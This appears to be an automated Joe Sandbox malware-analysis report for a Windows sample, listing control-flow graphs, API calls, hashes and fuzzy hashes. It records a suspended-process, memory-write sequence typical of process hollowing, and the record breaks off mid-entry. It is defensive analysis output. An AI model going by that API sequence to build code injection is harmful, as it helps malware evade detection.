                    control_flow_graph 1324 40c366-40c36a 1325 40c370-40c3f8 call 417a50 call 405bc0 call 418110 1324->1325 1326 40c7f9-40c7ff 1324->1326 1351 40c3fa 1325->1351 1352 40c3fc-40c41a call 419580 1325->1352 1328 40c801-40c80d 1326->1328 1329 40c829-40c841 1326->1329 1333 40c81f-40c826 call 41d773 1328->1333 1334 40c80f-40c81d 1328->1334 1330 40c843-40c84f 1329->1330 1331 40c86b-40c886 call 41d101 1329->1331 1337 40c861-40c868 call 41d773 1330->1337 1338 40c851-40c85f 1330->1338 1333->1329 1334->1333 1335 40c896-40c8dd call 436d7a 1334->1335 1353 40c8f7-40c905 1335->1353 1354 40c8df-40c8f5 1335->1354 1337->1331 1338->1335 1338->1337 1351->1352 1361 40c420-40c48b call 417a50 call 405bc0 call 418110 1352->1361 1362 40c4b8 1352->1362 1356 40c90c-40c919 1353->1356 1357 40c907 call 418ef0 1353->1357 1354->1356 1359 40c933-40c941 1356->1359 1360 40c91b-40c931 1356->1360 1357->1356 1363 40c948-40c99c SHFileOperationA 1359->1363 1364 40c943 call 418ef0 1359->1364 1360->1363 1414 40c48d 1361->1414 1415 40c48f-40c4b0 call 419580 1361->1415 1365 40c4bb 1362->1365 1367 40c9c6-40c9de 1363->1367 1368 40c99e-40c9aa 1363->1368 1364->1363 1371 40c4bf-40c4c2 1365->1371 1369 40c9e0-40c9ec 1367->1369 1370 40ca08-40ca23 call 41d101 1367->1370 1373 40c9bc-40c9c3 call 41d773 1368->1373 1374 40c9ac-40c9ba 1368->1374 1375 40c9fe-40ca05 call 41d773 1369->1375 1376 40c9ee-40c9fc 1369->1376 1377 40c4c4-40c4cd 1371->1377 1378 40c4fa-40c504 1371->1378 1373->1367 1374->1373 1381 40ca24-40ca29 call 436d7a 1374->1381 1375->1370 1376->1375 1376->1381 1377->1378 1384 40c4cf-40c4da 1377->1384 1388 40c506-40c50f 1378->1388 1389 40c54f-40c559 1378->1389 1394 40c4f0-40c4f7 call 41d773 1384->1394 1395 40c4dc-40c4ea 1384->1395 1398 40c511-40c51d 1388->1398 1399 40c53d-40c54b 1388->1399 1391 40c591-40c59b 1389->1391 1392 40c55b-40c564 1389->1392 1403 40c5d4-40c5d8 1391->1403 1404 40c59d-40c5a3 1391->1404 1392->1391 1400 40c566-40c571 1392->1400 1394->1378 1395->1394 1401 40c887 call 436d7a 1395->1401 1406 40c533-40c53a call 41d773 1398->1406 1407 40c51f-40c52d 1398->1407 1399->1389 1410 40c573-40c581 1400->1410 1411 40c587-40c58e call 41d773 1400->1411 1424 40c88c call 436d7a 1401->1424 1408 40c6db-40c6ed call 418110 1403->1408 1409 40c5de-40c605 call 417a50 call 405bc0 1403->1409 1404->1403 1413 40c5a5-40c5b4 1404->1413 1406->1399 1407->1401 1407->1406 1428 40c6f2-40c70d call 436839 1408->1428 1440 40c607 1409->1440 1441 40c609-40c61a 1409->1441 1410->1401 1410->1411 1411->1391 1421 40c5b6-40c5c4 1413->1421 1422 40c5ca-40c5d1 call 41d773 1413->1422 1414->1415 1415->1365 1436 40c4b2-40c4b6 1415->1436 1421->1401 1421->1422 1422->1403 1432 40c891 call 436d7a 1424->1432 1442 40c71d-40c725 1428->1442 1443 40c70f-40c718 call 4368c7 1428->1443 1432->1335 1436->1371 1440->1441 1445 40c61c-40c63c call 434360 1441->1445 1446 40c63e-40c649 call 419050 1441->1446 1444 40c730-40c74b call 436839 1442->1444 1452 40c7c5-40c7cb 1443->1452 1456 40c75d-40c789 call 417a50 * 2 call 40bb60 1444->1456 1457 40c74d-40c75b call 4368c7 1444->1457 1455 40c64e-40c658 1445->1455 1446->1455 1452->1326 1458 40c7cd-40c7d9 1452->1458 1459 40c689-40c6a5 1455->1459 1460 40c65a-40c669 1455->1460 1478 40c78c-40c7a7 call 436839 1456->1478 1457->1478 1465 40c7db-40c7e9 1458->1465 1466 40c7ef-40c7f6 call 41d773 1458->1466 1461 40c6a7-40c6c7 call 434360 1459->1461 1462 40c6c9-40c6d9 call 419050 1459->1462 1467 40c66b-40c679 1460->1467 1468 40c67f-40c686 call 41d773 1460->1468 1461->1428 1462->1428 1465->1432 1465->1466 1466->1326 1467->1424 1467->1468 1468->1459 1485 40c7b4-40c7b9 Sleep 1478->1485 1486 40c7a9-40c7b2 call 4368c7 1478->1486 1489 40c7bb-40c7bf 1485->1489 1486->1489 1489->1444 1489->1452
                    APIs
                      • Part of subcall function 00417A50: __Cnd_destroy_in_situ.LIBCPMT ref: 00417B48
                      • Part of subcall function 00417A50: __Mtx_destroy_in_situ.LIBCPMT ref: 00417B51
                    • Sleep.KERNEL32(00001388), ref: 0040C7B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
                    • String ID:
                    • API String ID: 113500496-0
                    • Opcode ID: ad0b87b450f1baf879a39e5442e694f600d6a99994e99dd76fa00f6b0501f434
                    • Instruction ID: 9909c573ad9e99750a0bf64cc227376511406c5771d8e5e7903b78f8a5ef9b2a
                    • Opcode Fuzzy Hash: ad0b87b450f1baf879a39e5442e694f600d6a99994e99dd76fa00f6b0501f434
                    • Instruction Fuzzy Hash: 8912D371A00108DBDF04DF68C985BDDBBB5EF49304F64422EE815B72C2D739AA85CB99
                    Function 044C0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1504 44c0e0f-44c0e24 SetErrorMode * 2 1505 44c0e2b-44c0e2c 1504->1505 1506 44c0e26 1504->1506 1506->1505
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,044C0223,?,?), ref: 044C0E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,044C0223,?,?), ref: 044C0E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: dd27885c3c87af55883d42dcb9774b72eb2199495f9e01673a766c979f758aae
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 15D01235145128B7DB403AD4DC09BDE7B1CDF05B62F048011FB0DD9180C770954046E5
                    Function 0040D109 Relevance: 1.9, APIs: 1, Instructions: 386COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1507 40d109-40d13a GetModuleFileNameA 1508 40d141-40d146 1507->1508 1508->1508 1509 40d148-40d1a2 call 418110 call 417a50 call 405bc0 call 40ca30 1508->1509 1518 40d1a4-40d1af 1509->1518 1519 40d1bb-40d1d6 call 419050 1509->1519 1520 40d1b1 1518->1520 1521 40d1b3-40d1b9 1518->1521 1523 40d1d8-40d24b call 418270 1519->1523 1520->1521 1521->1523 1527 40d24d 1523->1527 1528 40d24f-40d270 call 419580 1523->1528 1527->1528 1531 40d2a1-40d2c9 1528->1531 1532 40d272-40d281 1528->1532 1533 40d2fa-40d322 1531->1533 1534 40d2cb-40d2da 1531->1534 1535 40d283-40d291 1532->1535 1536 40d297-40d29e call 41d773 1532->1536 1541 40d353-40d37b 1533->1541 1542 40d324-40d333 1533->1542 1539 40d2f0-40d2f7 call 41d773 1534->1539 1540 40d2dc-40d2ea 1534->1540 1535->1536 1537 40d52c call 436d7a 1535->1537 1536->1531 1552 40d531-40d5f8 call 436d7a call 409200 call 417a50 call 405bc0 call 418270 call 417a50 call 405bc0 call 417a50 call 405bc0 call 405e90 1537->1552 1539->1533 1540->1537 1540->1539 1543 40d3ac-40d3ce 1541->1543 1544 40d37d-40d38c 1541->1544 1548 40d335-40d343 1542->1548 1549 40d349-40d350 call 41d773 1542->1549 1553 40d3d0-40d3db 1543->1553 1554 40d3fb-40d402 1543->1554 1550 40d3a2-40d3a9 call 41d773 1544->1550 1551 40d38e-40d39c 1544->1551 1548->1537 1548->1549 1549->1541 1550->1543 1551->1537 1551->1550 1611 40d622-40d63a 1552->1611 1612 40d5fa-40d606 1552->1612 1559 40d3f1-40d3f8 call 41d773 1553->1559 1560 40d3dd-40d3eb 1553->1560 1561 40d498-40d4a1 1554->1561 1562 40d408-40d490 call 418110 * 2 call 417a50 * 2 call 40b170 1554->1562 1559->1554 1560->1537 1560->1559 1568 40d4a3-40d4b2 1561->1568 1569 40d4ce-40d4d7 1561->1569 1599 40d495 1562->1599 1570 40d4c4-40d4cb call 41d773 1568->1570 1571 40d4b4-40d4c2 1568->1571 1572 40d504-40d521 call 41d101 1569->1572 1573 40d4d9-40d4e8 1569->1573 1570->1569 1571->1552 1571->1570 1578 40d4fa-40d501 call 41d773 1573->1578 1579 40d4ea-40d4f8 1573->1579 1578->1572 1579->1552 1579->1578 1599->1561 1615 40d664-40d673 1611->1615 1616 40d63c-40d648 1611->1616 1613 40d618-40d61f call 41d773 1612->1613 1614 40d608-40d616 1612->1614 1613->1611 1614->1613 1619 40d674-40d679 call 436d7a 1614->1619 1617 40d65a-40d661 call 41d773 1616->1617 1618 40d64a-40d658 1616->1618 1617->1615 1618->1617 1618->1619
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D117
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileModuleName
                    • String ID:
                    • API String ID: 514040917-0
                    • Opcode ID: c60b44cba65ad7ba7fef53619f3889c2829e01807d2db3d9e810612548e0c43b
                    • Instruction ID: 7aa9eb5b4b860a37ccad2f95597d9be3fd9bbfb438b280bae5d5354745136ecf
                    • Opcode Fuzzy Hash: c60b44cba65ad7ba7fef53619f3889c2829e01807d2db3d9e810612548e0c43b
                    • Instruction Fuzzy Hash: CBE10771E002549BEB19DB78CD497DDBB71AF46308F1042DED4086B3C2DB799B888B99
                    Function 0040D680 Relevance: 1.7, APIs: 1, Instructions: 164COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1626 40d680-40d8ed call 40ca30 call 417a50 call 405bc0 call 418790 call 418270 GetModuleFileNameA 1641 40d8f0-40d8f5 1626->1641 1641->1641 1642 40d8f7-40dacb call 418110 call 419580 1641->1642 1650 40dafc-40db19 call 41d101 1642->1650 1651 40dacd-40dadc 1642->1651 1653 40daf2-40daf9 call 41d773 1651->1653 1654 40dade-40daec 1651->1654 1653->1650 1654->1653 1656 40db7b-40db80 call 436d7a 1654->1656
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4712d49a243cdabdbad1a7b87602ae6a1777f3f552df2923a8a6ceb4cf70a86f
                    • Instruction ID: dac0f5e970660739917d7c2007d5a0deabbb8cdb447ff5b2a99196646c7ba1be
                    • Opcode Fuzzy Hash: 4712d49a243cdabdbad1a7b87602ae6a1777f3f552df2923a8a6ceb4cf70a86f
                    • Instruction Fuzzy Hash: 7B51DE70E042589BEB25DB64CD89BDEBBB1AB05304F5041EAD40867282DB795FC8CF95
                    Function 0040C8A0 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1661 40c8a0-40c8dd 1662 40c8f7-40c905 1661->1662 1663 40c8df-40c8f5 1661->1663 1664 40c90c-40c919 1662->1664 1665 40c907 call 418ef0 1662->1665 1663->1664 1666 40c933-40c941 1664->1666 1667 40c91b-40c931 1664->1667 1665->1664 1668 40c948-40c99c SHFileOperationA 1666->1668 1669 40c943 call 418ef0 1666->1669 1667->1668 1670 40c9c6-40c9de 1668->1670 1671 40c99e-40c9aa 1668->1671 1669->1668 1672 40c9e0-40c9ec 1670->1672 1673 40ca08-40ca23 call 41d101 1670->1673 1674 40c9bc-40c9c3 call 41d773 1671->1674 1675 40c9ac-40c9ba 1671->1675 1676 40c9fe-40ca05 call 41d773 1672->1676 1677 40c9ee-40c9fc 1672->1677 1674->1670 1675->1674 1679 40ca24-40ca29 call 436d7a 1675->1679 1676->1673 1677->1676 1677->1679
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d37c009292c7d8192c68702c147d0cf0a0439ce37f54c6f001c3db6152093e29
                    • Instruction ID: c6498abaad0327c0561bb40e3dadd450b9ffb201cab76c175979097a24c33401
                    • Opcode Fuzzy Hash: d37c009292c7d8192c68702c147d0cf0a0439ce37f54c6f001c3db6152093e29
                    • Instruction Fuzzy Hash: C7318D71A10248AFEB04DF68C985BDEBBB5FF49304F10462AF815A72C1D7799980CB98
                    Function 0043ACF3 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __wsopen_s
                    • String ID:
                    • API String ID: 3347428461-0
                    • Opcode ID: 614a3e3ee89691309344d2c14c20bc16bf30284b6f7f3b8c42e64e4b54115df9
                    • Instruction ID: 2ec4cfe0dad6ab8aed3ec9bb528ac9be46e2dd1aba8fd40cc46cdcf008e8708c
                    • Opcode Fuzzy Hash: 614a3e3ee89691309344d2c14c20bc16bf30284b6f7f3b8c42e64e4b54115df9
                    • Instruction Fuzzy Hash: 84115A71A0420AAFCF09DF58E94198B7BF5EF48304F04406AF808EB311D630EE21CB69
                    Function 00441ACE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: e898f6e6f3fdb114fc582850e36c3fd83bcfe2d7093314ec39bec91d9d9ed899
                    • Instruction ID: 619686980a94c91a96dc5e1f64013ceebeb6e5bb181467a0b6342c5070a9d782
                    • Opcode Fuzzy Hash: e898f6e6f3fdb114fc582850e36c3fd83bcfe2d7093314ec39bec91d9d9ed899
                    • Instruction Fuzzy Hash: DE012C72C00159BFDF02AFA88C01AEE7FF5EF08314F14416AF914A2161E6358A65DB95
                    Function 00441815 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(00000000,00000000,?,00441C05,?,?,00000000,?,00441C05,00000000,0000000C), ref: 00441832
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
                    • Instruction ID: 728716dea2d8701cc34847fc6eeab83fc4e7ccc419190b368175d6442f09313a
                    • Opcode Fuzzy Hash: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
                    • Instruction Fuzzy Hash: 10D06C3201020DBBDF028F84DC06EDE3BAAFB48715F014150BA1856020C732E861AB94
                    Function 00408782 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesA.KERNELBASE(?), ref: 00408789
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
                    • Instruction ID: 789fed60249ad8487cd2233da5116ea2fb7e09c640f53059edfd99c86290eb63
                    • Opcode Fuzzy Hash: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
                    • Instruction Fuzzy Hash: F8C0122800060046DD180A386B48455330156433757E40BA9E5F1671E5CA3D58079608
                    Function 00408780 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesA.KERNELBASE(?), ref: 00408789
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
                    • Instruction ID: d292f878e85dccc847fdb363e351687f19c9a12ceb3464221f462bb5f8416341
                    • Opcode Fuzzy Hash: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
                    • Instruction Fuzzy Hash: 0AC0123800020086DA1C4A287B4841533119A423353F40B7DE5F1671E5CB3AC803C658
                    Function 0296002D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0296007E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0295F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_295f000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 2633c43a4532ae807ef926eaf87e33ea6b8db5c09dbaa80fbfd6c2d3a4a1b401
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 1C113C79A00208EFDB01DF98C989E98BBF5AF08351F158094F9489B361D771EA50DF80

                    Non-executed Functions

                    Function 0041C878 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0041C87E
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041C88C
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041C89D
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041C8AE
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041C8BF
                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0041C8D0
                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0041C8E1
                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0041C8F2
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0041C903
                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0041C914
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0041C925
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0041C936
                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0041C947
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0041C958
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0041C969
                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0041C97A
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0041C98B
                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0041C99C
                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0041C9AD
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0041C9BE
                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0041C9CF
                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0041C9E0
                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0041C9F1
                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0041CA02
                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0041CA13
                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0041CA24
                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041CA35
                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0041CA46
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041CA57
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041CA68
                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0041CA79
                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0041CA8A
                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0041CA9B
                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0041CAAC
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0041CABD
                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0041CACE
                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0041CADF
                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0041CAF0
                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0041CB01
                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0041CB12
                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0041CB23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                    • API String ID: 667068680-295688737
                    • Opcode ID: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
                    • Instruction ID: 0f84095e92aac1c2e0bb15fd21b29d90348e2d41669b35d16af1684e6b0aebcd
                    • Opcode Fuzzy Hash: 33ab0460f6536ff686f2647f824dff4c0f5cd89bd5de9affe1c197909d8f0196
                    • Instruction Fuzzy Hash: 38612875952711EBD7016FB4FC0DF893AB8AA09B53B608537F906D21B2E6F88004CB6D
                    Function 00407110 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040713D
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040719B
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 004071B4
                    • GetThreadContext.KERNEL32(?,00000000), ref: 004071C9
                    • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 004071E9
                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040722B
                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00407248
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00407301
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                    • String ID: $VUUU$invalid stoi argument
                    • API String ID: 3796053839-3954507777
                    • Opcode ID: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction ID: 366fe4445ccda86ac4365a5b5e7cea4355bbaaae95b1a624cf57fc235f8353fe
                    • Opcode Fuzzy Hash: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction Fuzzy Hash: 85416D75644301BFE7209F50DC06F9A7BE8BF88B15F000429F684E62D1DBB4E954CB9A
                    Function 044C7377 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 121memoryprocessthreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 044C73A4
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 044C7402
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 044C741B
                    • GetThreadContext.KERNEL32(?,00000000), ref: 044C7430
                    • ReadProcessMemory.KERNEL32(?,00458E08,?,00000004,00000000), ref: 044C7450
                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 044C7492
                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 044C74AF
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 044C7568
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                    • String ID: VUUU
                    • API String ID: 3796053839-2040033107
                    • Opcode ID: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction ID: ddf1b8e083b8bc99d18df12cd1e52b4e4f6b29d6a9fda21d2478e15bddea92ea
